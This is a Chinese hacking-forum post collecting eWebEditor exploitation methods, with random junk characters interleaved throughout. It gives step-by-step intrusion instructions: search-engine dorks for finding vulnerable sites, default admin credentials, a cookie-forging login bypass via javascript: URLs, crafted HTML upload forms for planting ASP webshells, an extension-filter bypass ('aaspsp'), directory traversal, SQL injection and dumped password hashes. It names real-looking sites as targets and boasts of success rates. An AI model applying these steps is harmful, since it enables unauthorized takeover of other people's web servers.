eWebEditor.asp?id=45&style=standard1 样式调用! Q, ~1 f: p: z
( R1 a, L2 ~' l* x) d; U
. ^% s2 \7 ]4 b) L* v; S* w& `
/edit/admin_uploadfile.asp?id=14&dir=../../..
& ^2 R9 L7 f- h8 Q可以浏览网站目录 ../自己加或者减
$ P5 c# l/ x0 |0 ]+ i9 w
, H. \+ b$ @2 }有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
2 e& _& o) |% v% m$ @5 [7 \简单利用就是
2 ]5 y8 k; ^6 g2 Whttp://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
" j; M9 I# K1 _. U! A3 Y0 f" O5 O1 Lhttp://www.siqinci.com/ewebedito ... amp;style=full_v200
! s8 m- H: `% P2 i2 H% D& L可以利用nbsi进行猜解,对此进行注入
# U3 a2 _5 N( O7 _ t还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的2 I2 s$ j( ]& H. U7 e# T7 [
这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:
. D1 W8 q0 V2 z- ~" {) L. h, d在action下面
$ Q5 T+ V0 B1 F& {" K<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">+ |+ s3 O( C4 O6 m' k: y( I
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">1 t7 F0 F1 t) k$ e0 x% l
<input type="submit" name="uploadfile" value="提交">
: f- G3 e& P. d! U) N: u<input type=hidden name=originalfile value="">
3 W8 M! {. |. s- n</form>
, i3 h$ N/ O% j& N1 r------------------------------------------------------------------------------------------------------------------------------------------------) w- o- z6 I/ m2 o' a$ a9 n
<input type="submit" name="uploadfile" value="提交"> 放在action后头
, A1 s$ X6 _0 m2 I( `) L1 b,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。6 b" G& H) Q8 o
/ }3 x* ^/ i$ F) u
) M1 U- H/ E" Y& G$ \
7 R* [# A7 o; R' y$ U! }/ Q' f5 }
5 }: U) T/ Z" k' G
Ewebeditor最新漏洞及漏洞大全[收集] (图)
- f8 l' Q3 x) m2 x$ _: l9 u5 b本帖最后由 administrator 于 2009-7-7 21:24 编辑5 k, S* E. M8 h4 \3 d/ {7 Q" \
6 y% u% Q! M9 U+ Y以下文章收集转载于网络5 x. B2 E8 @+ w6 T
#主题描述# ewebeditor 3.8漏洞[php]
: |, e1 S( f$ u0 B. g$ G--------------------------------------------------------------------------------------------/ a x& S f$ k; f4 k* _
#内容#$ y- P5 [6 D2 q" c7 s
php版ewebeditor 3.8的漏洞5 c- j7 j! G6 `; |( N) g
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:" ]0 G- }; f" p* J
1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,- n9 t' j# c2 o; ?
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了8 C+ H& e& P. C# ~5 Y. \- F
3 后面的利用和asp一样,新增样式修改上传,就ok了! @3 ^8 K- Z8 q. D
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)) X; c* x& j/ T7 k7 ?* T9 z
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
4 j( ~$ [( Y5 O/ I+ ^jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了
0 b3 v) x! D4 t5 b+ Z! X/ r5 V--------------------------------------------------------------------------------------------
; z: k2 N7 L5 @- g0 ]
; G" t, d6 `( M3 W: \. }6 B8 v* G( D
算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。7 i! A8 A, L( W8 }7 v
7 a& R. s" F4 |' ]漏洞更新日期TM: 2009 2 9日 转自zake’S Blog u) b* q( v V1 p9 j% V# Y
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
" H1 t/ u2 N2 Z9 F- z$ E0 H( w那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址+ X( E3 j/ K: p* C+ x1 ]8 B
; n, m1 }3 \9 Y; h
; I" v, c2 L! v- [- p* g" K. _6 p然后确定以后,这里是最关键的一部!- t- G9 @& C6 r) O+ A
这里点了远程上传以后,再提交得到木马地址) ?6 r Y! n6 J" [8 O
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限
% \( J, q+ a# O+ o3 H属于安全检测漏洞版本ewebeditor v6.0.0
7 Z* o5 {" o. F' V( Y/ P, S
3 P2 P7 i0 l/ d2 Q以前的ewebeditor漏洞:
^$ j0 a1 V2 R7 G0 e; p8 j( v9 n/ h; L" U+ O* Z
ewebeditor注入漏洞
7 s2 A& E( k* J3 Y
) {, d' J5 U5 w9 j大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb- S4 R' B1 m& X2 U% o- W( {" j
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
" E+ [$ x; l, H今天我给大家带来的也是ewebeditor编辑器的入侵方法
% ~, E5 p7 K0 p q$ O# Z不过一种是注入,一种是利用upload.asp文件,本地构造
3 L: Y0 l9 A5 p) O) B( {: }! xNO1:注入9 z. G5 Q8 q9 {9 t- p
http://www.XXX.com/ewebeditor200 ... amp;style=full_v200
1 y9 C2 D* F! Q编辑器ewebedior7以前版本通通存在注入 P8 I7 G. ~7 ?( p( _# }
直接检测不行的,要写入特征字符6 ~% ]) k) n( j% ^, D, T7 E# ?% Q
我们的工具是不知道ewebeditor的表名的还有列名& M7 r, q2 |8 U2 {
我们自己去看看3 t+ S# |- v. X) S f9 i
哎。。先表吧. Z$ G. ^0 @! L6 x. F9 m" Y
要先添加进库
- [* ~- ~7 n2 G f开始猜账号密码了% ?8 {( Z+ K- c1 J
我们==! u4 j. l; M3 t7 m$ z3 f% d" y
心急的往后拉
9 ~0 g# ~7 ?" o0 @7 p出来了3 U& X- R* g8 f
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 8511208 ?% P- _! Y, t$ U+ U
对吧^_^
: F+ B1 @* v( |, c* D后面不说了
" q" Y9 ? M/ }+ j( [ D9 D7 LNO2:利用upload.asp文件,本地构造上传shell
* N+ Y- z2 u0 G4 J( j9 d4 q+ ]" D5 B大家看这里7 C: \( O" a8 x- K2 b2 Z( Z
http://www.siqinci.com/ewebedito ... lepreview&id=37' X m9 E5 e. X" v' |! k; k& g( I5 w
如果遇见这样的情况又无法添加工具栏是不是很郁闷
H8 S% P0 l8 r: Y& G现在不郁闷了,^_^源源不一般
0 X# D, O6 U: J$ ^我们记录下他的样式名“aaa”
6 r. z# ? W+ Z5 W; z7 K' n& X我已经吧upload.asp文件拿出来了5 g! Q/ R) d2 V+ l# F. r
我们构造下$ }4 @! S" ^+ o
OK,我之前已经构造好了3 t" s% \3 D# ^
其实就是这里
! [% k8 V8 b9 R<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>8 R# Q% f" O& `4 J: o$ a
<input type=file name=uploadfile size=1 style=”width:100%”>
1 F( j* E0 ~* g9 A4 V5 T<input type=submit value=”上传了”></input>9 U" r- u4 X5 w6 s1 g2 I, T
</form>2 c# E0 H, R+ L8 D) M/ R5 [
下面我们运行他上传个大马算了
5 Z, i. f5 i. H# [+ ]UploadFile上传进去的在这个目录下
# l- g, ^2 A2 P4 z- @& a% n, V2008102018020762.asa* H: R: _4 z0 [+ n+ I$ p6 ^2 i
. x" F9 n1 {: v, r u. H( i$ U1 j" h* ]
过往漏洞:" J9 v% T; A+ x" s9 J, B$ q
5 L$ V: ]9 M4 B i+ j2 _% s: S
首先介绍编辑器的一些默认特征:
* T- v' d/ }( ^% B, \默认登陆admin_login.asp: |& y3 N8 W v4 }1 E2 M
默认数据库db/ewebeditor.mdb* y% {; n: }- t: H
默认帐号admin 密码admin或admin8886 r! @: u$ l# ?1 x2 l' l. s
搜索关键字:”inurl:ewebeditor” 关键字十分重要: w7 t, ^8 B! g1 V8 d9 l9 A
有人搜索”eWebEditor - eWebSoft在线编辑器”
( r% O0 |* w7 ~( e+ p8 W根本搜索不到几个~
1 H% Y1 C; W$ {! s: N+ F; U& ?6 u0 ?baidu.google搜索inurl:ewebeditor
. ~% n7 p! b# r8 f5 l3 R2 D- t/ t几万的站起码有几千个是具有默认特征的~' b0 C9 P6 E; [7 C
那么试一下默认后台; X: w X0 L7 o7 T i. H
http://www.xxx.com.cn/admin/ewebeditor/admin_login.asp3 w' s& C* t8 T6 p
试默认帐号密码登陆。- z% {) q, a$ B, M$ w! X
利用eWebEditor获得WebShell的步骤大致如下:% O; q( L2 ?6 B$ }9 L1 o
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。% m' c. e% w7 G% @* w
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。
8 P- u2 l/ {5 |7 W0 O+ N8 _3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。4 n* C# p, [' i1 y3 `9 v
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!% l K9 P2 x8 K2 @+ w- ~& G, c
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
8 D* d9 Q t7 [% \2 |7 ]然后在上传的文件类型中增加“asa”类型。
, p/ o( e K; @& A' p; x4 K5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
7 e2 b% h. i) Z" X; i$ _8 Y, G漏洞原理
" [; I1 m# |+ I9 N漏洞的利用原理很简单,请看Upload.asp文件:
$ U, h# p: `* l+ Z$ x7 }任何情况下都不允许上传asp脚本文件
! u. W) C+ q8 j% {, W) s3 usAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
" J! }! T; U7 {) E# `因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!% p2 P# q8 U+ e/ E+ }% _7 o. T/ m1 ]) q x
高级应用
0 X; Q# q0 d4 x( j" I. ceWebEditor的漏洞利用还有一些技巧:* n4 j* R, W2 F1 l, S
1.使用默认用户名和密码无法登录。
/ t1 f5 z: S b1 u( N" ?$ D请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。
, M4 I( n `1 o, c2.加了asa类型后发现还是无法上传。1 q% y) r2 N2 G; X/ G
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:
0 L, L& f$ V. s$ k% BsAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)
' N( K& d+ [( c4 c( Z" }7 o猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
( w4 u) c+ f; G) i, y- e) O3.上传了asp文件后,却发现该目录没有运行脚本的权限。
# ^& g' Q; ^7 u; O* E. o8 ?5 h呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
: ]$ b6 d+ M' D+ C- ?4.已经使用了第2点中的方法,但是asp类型还是无法上传。
- g8 f1 m5 G0 d9 @3 @看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
7 y# @$ V7 @: b R% }: t2 Y, J后记
2 A3 ]% i; X$ G/ K) A根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
6 @) h# h2 o0 @: K基本入侵基础漏洞. g R. [3 y* K: {' A
eWebEditor 漏洞$ ~; o/ I6 H5 t
- K- i* E9 @/ w0 Q1 x. m' A各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦!
1 R' |0 t; W' J5 O
0 s* _7 ~0 N! ~+ `, `0 v2 r漏洞利用
7 m; j0 D1 {& I6 m5 R" l/ q( G利用eWebEditor获得WebShell的步骤大致如下:% d* N ?7 x0 [1 d1 c
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。+ Z+ L+ Y8 d0 Y5 [2 ~. C r
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。7 m( q. n: e4 ^) A" Q6 P
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
f3 N% B( E! C: o1 D- R; T如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
/ ]7 H# C1 E# f# W6 o4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。 W* G& ^: n: W* e
9 T7 h# L( M/ `8 s然后在上传的文件类型中增加“asa”类型。
. u3 q8 {* I9 F) L; V) C
! L, I. ?5 Q- O3 n1 k& K6 C( @7 T V5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。) D \" ], h. }/ S
& _2 B7 X7 o- z0 d5 W
, [! A! y. ~6 p, d# y* r+ r1 S
漏洞原理. d3 G x) U! `5 W7 h
漏洞的利用原理很简单,请看Upload.asp文件:
, m: g3 m' I& C; J任何情况下都不允许上传asp脚本文件' a; {# `- Z! v2 q+ \% E
sAllowExt = replace(UCase(sAllowExt), "ASP", "")7 D5 Z' ^1 ^, x& z8 x( h/ r1 z4 N
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!" H* L, X; x; R% D. y9 @
% Q% m% U0 C% c- a9 j, `高级应用& E9 \8 O: K! v* E1 k* U, \+ ~; N
eWebEditor的漏洞利用还有一些技巧:
! i& A/ [& ^! a% X# K' m. u) [ [5 R1.使用默认用户名和密码无法登录。; o0 m4 Q m1 }4 F7 e# w
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。, D' |- u( W( S( m3 V3 j: B% C% B
2.加了asa类型后发现还是无法上传。
! [5 ~7 o0 }$ O1 p, G; f应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:( a1 {4 C! g& H- b
sAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
" I$ D' C! K7 |* g4 a1 Y7 O$ H7 l6 ^猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。" i2 G- P1 T3 o. D- l+ u; |0 i( z# F; H
3.上传了asp文件后,却发现该目录没有运行脚本的权限。0 G% g4 j7 U9 B/ u% W2 {
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。/ Q) K/ [+ Y3 r; z4 j% g
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
/ ~. i- ` O: c+ B% L s$ Z) e看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
+ r* q) }% C e7 b# q/ Q4 K1 H U- c) N' ~% e' I. z0 M8 t
后记
& d& g: @: @1 W' t. A根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上! |
发表于 2012-9-13 17:00:58
收藏
支持
反对